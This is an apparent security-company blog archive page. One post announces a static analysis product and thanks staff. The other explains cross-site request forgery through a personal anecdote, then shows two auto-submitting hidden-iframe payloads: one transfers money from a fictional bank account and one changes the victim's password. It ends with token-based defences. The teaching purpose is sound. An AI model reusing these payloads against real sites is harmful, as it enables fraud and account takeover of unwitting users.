Tag Archives: application security

WhiteHat Sentinel Source is Born!

1 Reply

June 1st 2012 was the official one-year mark since WhiteHat Security and Infrared Security decided to join forces to create WhiteHat Sentinel Source. After a significant amount of hard work from a lot of great people, WhiteHat Sentinel Source has gone public! I’m going to use this opportunity to write up a bit of a nostalgic blog post… while still keeping my Don Draper game face on of course. Having been an application security consultant for years, I’ve developed a pretty big chip on my shoulder as it relates to existing static analysis tools. I said to myself time and time again… “There has to be a better way to do this!” I put that energy to good use and infused our technology and service offering with the following core static analysis values that truly separate WhiteHat Sentinel Source from the competition:

1. Invest in Performance:

In order to support an Agile-paced development world, performance of both scan time and verification turnaround time are critical to success. We are constantly investing in our core technology and processes to ensure we get the fastest turnaround time possible!

2. Support Modern Programming Paradigms:

Development teams have adopted various modern programming paradigms and technologies that throw existing static analysis tools for a loop. Such paradigms and patterns include: Object-Oriented Programming, Aspect-Oriented Programming, Inversion of Control, Dependency Injection, etc. We are constantly striving to ensure that our technology has the ability to support these paradigms to accurately model modern source code!

3. Strive for Actionable Results:

Reviewing 100+ “findings” is a complete burden and dilutes the value of the technology. We are striving for quality over quantity throughout our core engine and RulePack development processes! “No grep-like rules” is something you’ll hear me say frequently.

4. Provide Feedback Early:

Performing source code scans at the end of a development initiative or even when the project distributable can be built is too late! Teams are constantly requesting feedback during the development phases, not at the end. We are constantly striving to ensure our ability to integrate with source code repositories such that we can provide feedback early in the development phase. This coupled with our core technology performance makes daily scans a possibility!

5. Leave Security to Security:

Putting a large static analysis report in front of a developer expecting them to triage and fix the results is a complete waste of time and energy. We are constantly striving to ensure that we enable developers to more effectively remediate significant vulnerabilities by performing the triage ourselves.

While the success of WhiteHat Sentinel Source is attributable to many individuals, there are a few folks who really stand out:

Jerry Hoff (VP, Static Analysis Division):

Jerry is an incredibly well-rounded application security expert and a long-time friend. Jerry played a critical role in disseminating our static analysis strategy to the rest of the team and really bootstrapped our ability to talk about static analysis in a way that actually makes sense to people. I always thought I had a great ability to make application security topics digestible until I met this guy. Very much a forward-thinking person, I refuse to have strategic discussions without his input. Jerry has been helping me push static analysis since day 1 at Infrared Security, and now at WhiteHat. We would have not even gotten half this far without his efforts… thank you Jerry!

Siamak Pazirandeh (Senior Software Architect):

Siamak is an incredibly talented developer, architect, and leader. The benevolent development dictator, Siamak (a.k.a. Max) was responsible for spearheading the integration of static analysis into WhiteHat’s existing DAST service model. This large effort involved designing and building a persistency model for evolving codebases optimized for the purpose of verification, scalability design, service delivery architecture, middleware integration, and overall project leadership. He’s already solved challenges with DAST, why not solve SAST too… thank you Max!

John Melton (Senior Application Security Researcher):

John too is an incredibly well-rounded application security expert with serious technical depth in Java. With his astounding work ethic, attention to detail, and everlasting pursuit of perfection, John Melton has become the lead of the Sentinel Source Java engine and RulePack R&D. His abilities and core values around product development provide me with the confidence I need so that I can focus energies on other development initiatives. He is also one of fewer than five people in the world who can very directly and bluntly call me out on my mistakes without me feeling insulted. I think it has to do with his southern accent… thank you John!

With the core technology in place and our integration with the Sentinel interface, WhiteHat Sentinel Source is ready! We fully intend to shake up this market and will continue to push forward with real innovation. We are making the pledge to strive for accuracy, timeliness and usability with our solution. We look forward to other vendors stepping up to our plate… competition will only make us work harder!!

My First CSRF

3 Replies

My First Cross-Site Request Forgery Experience

A while back I was sifting through the posts of my friends on one of today’s popular social networking sites when I saw an odd video called “baby elephant giving birth” – or something to that effect – posted by several of my friends. This tingled my security-spidey senses. I knew something wasn’t legit, but I didn’t know exactly what. I decided to get on an old desktop I rarely use to check it out.

This is what happened: I click the link and am warned that I’m leaving the safety of socialnetworksite.com. The video opens in a new tab and begins to play. I close the tab and return to my profile to see that I had now posted “baby elephant giving birth” for all of my friends to see. I was a victim of CSRF.

How This Happened

When I originally logged into socialnetworksite.com, it stored my authenticated session within a cookie, and from then on the site would use that cookie to ensure that I am authorized. When I left socialnetworksite.com and loaded the new page, evilsite.example.com, a piece of script was embedded on the evilsite.example.com page that executed upon loading. That script contained a POST request to socialnetworksite.com that posted the baby elephant video to my profile. Because the POST request is sent from my browser, the server checked my browser’s cookies to make sure that I was authorized to make that request, and I was.

How to Protect Against This Occurring as a Developer

The most common and effective form of CSRF protection is with a randomly generated token that is assigned to the beginning of each session and that expires at the end of the active session. You can also generate and expire CSRF tokens for each POST. Some sites use the Viewstate property in ASP.Net sites, but because a Viewstate just records the input data of a form, you can potentially guess what those inputs would be. Granted that a Viewstate is better than no protection at all, a randomly generated CSRF Token is just as easy to implement and much more effective.

Note: If there is Cross-Site Scripting on the same site, the token used is irrelevant, because the attacker can grab the token from your cookies and make whatever authenticated requests he chooses.

How to Avoid This Occurring as a User

Never click on untrusted or unfamiliar links. Make sure that any sensitive web sites you access – your email, banking accounts, etc. – are done in their own browser and kept separate from any other Web surfing.

For a description of how WhiteHat Security detects CSRF, check out Arian Evan’s blog at https://blog.whitehatsec.com/tag/csrf/.

So even though my example of CRSF was relatively harmless, the attack could have just as easily been directed towards a banking website to transfer money. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.

For transferring money, bigbank.com may have a form that looks something like this on its website:

<form name=”legitForm” action=”/transfer.php” method=”POST”>
<b>From account:<input name="transferFrom" value="" type="text">
<br>To account:<input name="transferTo" value="" type="text">

<br>Amount: <input name=”amount” value=”" type=”text
<span><input name=”transfer” value=”Transfer” type=”submit”></span>

</form>

When you fill out and submit the legitForm, the browser sends a POST request to the server that looks something like this:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

transferFrom=111222&transferTo=111333&amount=1.00&transfer=Transfer

Neither of the previous codes is relevant to the user, but they DO give the attacker the structure to build his own evil POST request containing his account information. The attacker embeds the following code onto his website that you clicked on:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”stealMoney” action=http://bigbank.com/transfer.php method=”POST” target=”hidden”>
<input type=”hidden” name=”transferFrom” value=””> ß——-Problem?
<input type=”hidden” name=”transferTo” value=”555666”>
<input type=”hidden” name=”amount” value=”1000000.00”>
<input type=”hidden” name=”transfer” value=”Transfer”>
</form>
<script>document.stealMoney.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. Not only does it not require any user action other than loading the website; there is also no indication to the user that a request was ever sent.

Now here’s another example, but using a “change password request,” instead. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.  Most likely, bigbank.com’s website will have a “Change User’s Password” form that looks something like this:

<form name=”changePass” action=”/changePassword.php” method=”POST”>
<b>New Password: <input name="newPass" value="" type="text">
<br>Confirm Pasword:<input name="confirmPass" value="" type="text">

<span><input name=”passChange” value=”Change” type=”submit”></span>

</form>

When you fill out and submit the valid changePass form, the browser sends a POST request that will look similar to this to the server:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

newPass=iloveyou&confirmPass=iloveyou&passChange=”Change”

Again, while neither of the previous codes is relevant to the user, they DO give the attacker the structure to build his own evil POST request containing the information he wants to submit. The attacker embeds the following code onto his website that you clicked on; then, when the page loads, the code executes:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”makePassword” action=http://bigbank.com/changePassword.php method=”POST” target=”hidden”>
<input type=”hidden” name=”newPass” value=”Stolen!”>
<input type=”hidden” name=”confirmPass” value=”Stolen!”>
<input type=”hidden” name=”passChange” value=”Change”>
</form>
<script>document.makePassword.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. And, as in the example above, not only is no user action required other than loading the website, there is no indication to the user that a request was ever sent.